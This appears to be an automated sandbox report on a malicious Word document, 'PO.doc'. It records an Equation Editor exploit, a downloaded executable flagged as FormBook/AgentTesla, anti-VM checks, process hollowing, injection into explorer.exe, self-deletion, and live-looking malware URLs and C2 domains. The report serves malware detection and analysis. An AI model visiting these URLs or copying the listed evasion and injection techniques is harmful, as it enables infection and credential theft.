          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion:

          barindex
          Yara detected AntiVM3Show sources
          Source: Yara matchFile source: 00000004.00000002.420274782.0000000002491000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: ibeframnk863.exe PID: 2800, type: MEMORYSTR
          Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
          Source: ibeframnk863.exe, 00000004.00000002.420274782.0000000002491000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
          Source: ibeframnk863.exe, 00000004.00000002.420274782.0000000002491000.00000004.00000001.sdmpBinary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exeRDTSC instruction interceptor: First address: 0000000000409904 second address: 000000000040990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exeRDTSC instruction interceptor: First address: 0000000000409B6E second address: 0000000000409B74 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\svchost.exeRDTSC instruction interceptor: First address: 0000000000089904 second address: 000000000008990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\svchost.exeRDTSC instruction interceptor: First address: 0000000000089B6E second address: 0000000000089B74 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2548Thread sleep time: -240000s >= -30000sJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2548Thread sleep time: -60000s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exe TID: 668Thread sleep time: -37510s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exe TID: 1232Thread sleep time: -922337203685477s >= -30000sJump to behavior
          Source: C:\Windows\explorer.exe TID: 1188Thread sleep time: -34000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exe TID: 2836Thread sleep time: -36000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeLast function: Thread delayed
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exeCode function: 6_2_00409AA0 rdtsc 6_2_00409AA0
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exeThread delayed: delay time: 37510Jump to behavior
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: explorer.exe, 00000007.00000000.467550341.000000000456F000.00000004.00000001.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000
          Source: explorer.exe, 00000007.00000000.421707245.0000000000255000.00000004.00000020.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: ibeframnk863.exe, 00000004.00000002.420274782.0000000002491000.00000004.00000001.sdmpBinary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: ibeframnk863.exe, 00000004.00000002.420274782.0000000002491000.00000004.00000001.sdmpBinary or memory string: vmware
          Source: explorer.exe, 00000007.00000000.435525841.000000000449C000.00000004.00000001.sdmpBinary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0
          Source: explorer.exe, 00000007.00000000.467550341.000000000456F000.00000004.00000001.sdmpBinary or memory string: scsi\disk&ven_vmware&prod_virtual_disk\5&22be343f&0&000000
          Source: explorer.exe, 00000007.00000000.467574386.000000000457A000.00000004.00000001.sdmpBinary or memory string: pciide\idechannel\5&12368b4a&0&7ide\cdromnecvmwar_vmware_sata_cd01_______________1.00____\6&373888b8&0&1.0.0acpi\pnp0a05\5cacpi\pnp0a05\25pciide\idech7
          Source: explorer.exe, 00000007.00000000.446344659.00000000044E7000.00000004.00000001.sdmpBinary or memory string: ide\cdromnecvmwar_vmware_sata_cd01_______________1.00____\6&373888b8&0&1.0.0
          Source: explorer.exe, 00000007.00000000.421757574.000000000029B000.00000004.00000020.sdmpBinary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0*N
          Source: explorer.exe, 00000007.00000000.467666466.00000000045CF000.00000004.00000001.sdmpBinary or memory string: \\?\ide#cdromnecvmwar_vmware_sata_cd01_______________1.00____#6&373888b8&0&1.0.0#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: ibeframnk863.exe, 00000004.00000002.420274782.0000000002491000.00000004.00000001.sdmpBinary or memory string: VMware SVGA II
          Source: ibeframnk863.exe, 00000004.00000002.420274782.0000000002491000.00000004.00000001.sdmpBinary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exeCode function: 6_2_00409AA0 rdtsc 6_2_00409AA0
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exeCode function: 6_2_00A826F8 mov eax, dword ptr fs:[00000030h]6_2_00A826F8
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_00A126F8 mov eax, dword ptr fs:[00000030h]8_2_00A126F8
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPortJump to behavior
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exeCode function: 6_2_0040ACE0 LdrLoadDll,6_2_0040ACE0
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exeMemory allocated: page read and write | page guardJump to behavior

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeNetwork Connect: 63.250.43.8 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.personowner.guru
          Source: C:\Windows\explorer.exeDomain query: www.audiofactaesthetic.com
          Source: C:\Windows\explorer.exeNetwork Connect: 99.83.154.118 80Jump to behavior
          Sample uses process hollowing techniqueShow sources
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exeSection unmapped: C:\Windows\SysWOW64\svchost.exe base address: 5E0000Jump to behavior
          Maps a DLL or memory area into another processShow sources
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exeSection loaded: unknown target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exeSection loaded: unknown target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read writeJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Injects a PE file into a foreign processesShow sources
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exeMemory written: C:\Users\user\AppData\Roaming\ibeframnk863.exe base: 400000 value starts with: 4D5AJump to behavior
          Queues an APC in another process (thread injection)Show sources
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exeThread APC queued: target process: C:\Windows\explorer.exeJump to behavior
          Modifies the context of a thread in another process (thread injection)Show sources
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exeThread register set: target process: 1764Jump to behavior
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exeThread register set: target process: 1764Jump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeThread register set: target process: 1764Jump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\ibeframnk863.exe C:\Users\user\AppData\Roaming\ibeframnk863.exeJump to behavior
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exeProcess created: C:\Users\user\AppData\Roaming\ibeframnk863.exe C:\Users\user\AppData\Roaming\ibeframnk863.exeJump to behavior
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exeProcess created: C:\Users\user\AppData\Roaming\ibeframnk863.exe C:\Users\user\AppData\Roaming\ibeframnk863.exeJump to behavior
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\SysWOW64\svchost.exeJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\AppData\Roaming\ibeframnk863.exe'Jump to behavior
          Source: explorer.exe, 00000007.00000000.421919060.0000000000750000.00000002.00020000.sdmp, svchost.exe, 00000008.00000002.694662183.0000000001DE0000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000007.00000000.421707245.0000000000255000.00000004.00000020.sdmpBinary or memory string: ProgmanG
          Source: explorer.exe, 00000007.00000000.421919060.0000000000750000.00000002.00020000.sdmp, svchost.exe, 00000008.00000002.694662183.0000000001DE0000.00000002.00020000.sdmpBinary or memory string: !Progman
          Source: explorer.exe, 00000007.00000000.421919060.0000000000750000.00000002.00020000.sdmp, svchost.exe, 00000008.00000002.694662183.0000000001DE0000.00000002.00020000.sdmpBinary or memory string: Program Manager<
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exeQueries volume information: C:\Users\user\AppData\Roaming\ibeframnk863.exe VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

          Stealing of Sensitive Information:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 6.2.ibeframnk863.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.ibeframnk863.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.ibeframnk863.exe.354fd50.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.ibeframnk863.exe.34be4f0.4.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000008.00000002.691810653.0000000000080000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.504459582.0000000000240000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000000.449384949.0000000009657000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.503955974.00000000000F0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000000.441720043.0000000009657000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.692258695.0000000000310000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.691878203.00000000000B0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.504577711.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.421259188.0000000003499000.00000004.00000001.sdmp, type: MEMORY

          Remote Access Functionality:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 6.2.ibeframnk863.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.ibeframnk863.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.ibeframnk863.exe.354fd50.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.ibeframnk863.exe.34be4f0.4.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000008.00000002.691810653.0000000000080000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.504459582.0000000000240000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000000.449384949.0000000009657000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.503955974.00000000000F0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000000.441720043.0000000009657000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.692258695.0000000000310000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.691878203.00000000000B0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.504577711.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.421259188.0000000003499000.00000004.00000001.sdmp, type: MEMORY

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsShared Modules1Path InterceptionProcess Injection612Rootkit1Credential API Hooking1Security Software Discovery321Remote ServicesCredential API Hooking1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default AccountsExploitation for Client Execution13Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsMasquerading1LSASS MemoryProcess Discovery2Remote Desktop ProtocolArchive Collected Data1Exfiltration Over BluetoothIngress Tool Transfer14Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Disable or Modify Tools1Security Account ManagerVirtualization/Sandbox Evasion31SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Virtualization/Sandbox Evasion31NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol123SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptProcess Injection612LSA SecretsFile and Directory Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonDeobfuscate/Decode Files or Information1Cached Domain CredentialsSystem Information Discovery113VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup ItemsObfuscated Files or Information4DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
          Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobSoftware Packing13Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 signatures2 2 Behavior Graph ID: 492582 Sample: PO.doc Startdate: 28/09/2021 Architecture: WINDOWS Score: 100 50 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->50 52 Multi AV Scanner detection for domain / URL 2->52 54 Found malware configuration 2->54 56 18 other signatures 2->56 9 EQNEDT32.EXE 11 2->9         started        14 WINWORD.EXE 291 23 2->14         started        process3 dnsIp4 38 fantecheo.tk 185.239.243.112, 49165, 80 CLOUDIE-AS-APCloudieLimitedHK Moldova Republic of 9->38 32 C:\Users\user\AppData\...\ibeframnk863.exe, PE32 9->32 dropped 34 C:\Users\user\AppData\...\ibefrankszx[1].exe, PE32 9->34 dropped 74 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 9->74 16 ibeframnk863.exe 9->16         started        36 C:\Users\user\Desktop\~$PO.doc, data 14->36 dropped file5 signatures6 process7 signatures8 44 Multi AV Scanner detection for dropped file 16->44 46 Tries to detect virtualization through RDTSC time measurements 16->46 48 Injects a PE file into a foreign processes 16->48 19 ibeframnk863.exe 16->19         started        22 ibeframnk863.exe 16->22         started        process9 signatures10 58 Modifies the context of a thread in another process (thread injection) 19->58 60 Maps a DLL or memory area into another process 19->60 62 Sample uses process hollowing technique 19->62 64 Queues an APC in another process (thread injection) 19->64 24 svchost.exe 19->24         started        27 explorer.exe 19->27 injected process11 dnsIp12 66 Modifies the context of a thread in another process (thread injection) 24->66 68 Maps a DLL or memory area into another process 24->68 70 Tries to detect virtualization through RDTSC time measurements 24->70 30 cmd.exe 24->30         started        40 www.audiofactaesthetic.com 63.250.43.8, 49167, 80 NAMECHEAP-NETUS United States 27->40 42 www.personowner.guru 99.83.154.118, 49166, 80 AMAZON-02US United States 27->42 72 System process connects to network (likely due to code injection or exploit) 27->72 signatures13 process14

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          PO.doc43%VirustotalBrowse
          PO.doc29%ReversingLabsDocument-RTF.Exploit.Heuristic

          Dropped Files

          SourceDetectionScannerLabelLink
          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\ibefrankszx[1].exe20%ReversingLabsByteCode-MSIL.Trojan.AgentTesla
          C:\Users\user\AppData\Roaming\ibeframnk863.exe20%ReversingLabsByteCode-MSIL.Trojan.AgentTesla

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          6.2.ibeframnk863.exe.400000.1.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          http://wellformedweb.org/CommentAPI/0%URL Reputationsafe
          http://www.iis.fhg.de/audioPA0%URL Reputationsafe
          www.handelsbetriebposavec.com/if60/9%VirustotalBrowse
          www.handelsbetriebposavec.com/if60/0%Avira URL Cloudsafe
          http://fantecheo.tk/ibefrankszx.exe17%VirustotalBrowse
          http://fantecheo.tk/ibefrankszx.exe100%Avira URL Cloudmalware
          http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
          http://treyresearch.net0%URL Reputationsafe
          http://java.sun.com0%VirustotalBrowse
          http://java.sun.com0%Avira URL Cloudsafe
          http://www.icra.org/vocabulary/.0%URL Reputationsafe
          http://computername/printers/printername/.printer0%Avira URL Cloudsafe
          http://www.%s.comPA0%URL Reputationsafe
          http://servername/isapibackend.dll0%Avira URL Cloudsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          www.audiofactaesthetic.com
          		63.250.43.8
          		truefalse
            		high
            fantecheo.tk
            		185.239.243.112
            		truefalse
              		high
              www.personowner.guru
              		99.83.154.118
              		truefalse
                		high

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                www.handelsbetriebposavec.com/if60/true
                • 9%, Virustotal, Browse
                • Avira URL Cloud: safe
                		low
                http://fantecheo.tk/ibefrankszx.exetrue
                • 17%, Virustotal, Browse
                • Avira URL Cloud: malware
                		unknown

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                http://www.windows.com/pctv.explorer.exe, 00000007.00000000.433579752.0000000002AE0000.00000002.00020000.sdmpfalse
                  		high
                  http://investor.msn.comexplorer.exe, 00000007.00000000.433579752.0000000002AE0000.00000002.00020000.sdmpfalse
                    		high
                    http://www.msnbc.com/news/ticker.txtexplorer.exe, 00000007.00000000.433579752.0000000002AE0000.00000002.00020000.sdmpfalse
                      		high
                      http://wellformedweb.org/CommentAPI/explorer.exe, 00000007.00000000.427099874.0000000004650000.00000002.00020000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=1explorer.exe, 00000007.00000000.435525841.000000000449C000.00000004.00000001.sdmpfalse
                        		high
                        http://www.iis.fhg.de/audioPAexplorer.exe, 00000007.00000000.427099874.0000000004650000.00000002.00020000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=1LMEMexplorer.exe, 00000007.00000000.467666466.00000000045CF000.00000004.00000001.sdmpfalse
                          		high
                          http://windowsmedia.com/redir/services.asp?WMPFriendly=trueexplorer.exe, 00000007.00000000.424933060.0000000002CC7000.00000002.00020000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          http://www.hotmail.com/oeexplorer.exe, 00000007.00000000.433579752.0000000002AE0000.00000002.00020000.sdmpfalse
                            		high
                            http://treyresearch.netexplorer.exe, 00000007.00000000.427099874.0000000004650000.00000002.00020000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBSKZM1Y&prvid=77%2explorer.exe, 00000007.00000000.434757196.0000000003DF8000.00000004.00000001.sdmpfalse
                              		high
                              http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Checkexplorer.exe, 00000007.00000000.424933060.0000000002CC7000.00000002.00020000.sdmpfalse
                                		high
                                http://java.sun.comexplorer.exe, 00000007.00000000.421707245.0000000000255000.00000004.00000020.sdmpfalse
                                • 0%, Virustotal, Browse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.icra.org/vocabulary/.explorer.exe, 00000007.00000000.424933060.0000000002CC7000.00000002.00020000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.explorer.exe, 00000007.00000000.463319655.0000000001BE0000.00000002.00020000.sdmp, svchost.exe, 00000008.00000002.694748305.00000000031E0000.00000002.00020000.sdmpfalse
                                  		high
                                  http://www.msn.com/de-de/?ocid=iehp4MP&explorer.exe, 00000007.00000000.446344659.00000000044E7000.00000004.00000001.sdmpfalse
                                    		high
                                    http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanervexplorer.exe, 00000007.00000000.467666466.00000000045CF000.00000004.00000001.sdmpfalse
                                      		high
                                      http://investor.msn.com/explorer.exe, 00000007.00000000.433579752.0000000002AE0000.00000002.00020000.sdmpfalse
                                        		high
                                        http://www.msn.com/?ocid=iehpexplorer.exe, 00000007.00000000.446344659.00000000044E7000.00000004.00000001.sdmpfalse
                                          		high
                                          https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=12explorer.exe, 00000007.00000000.435525841.000000000449C000.00000004.00000001.sdmpfalse
                                            		high
                                            http://www.msn.com/de-de/?ocid=iehpexplorer.exe, 00000007.00000000.446344659.00000000044E7000.00000004.00000001.sdmpfalse
                                              		high
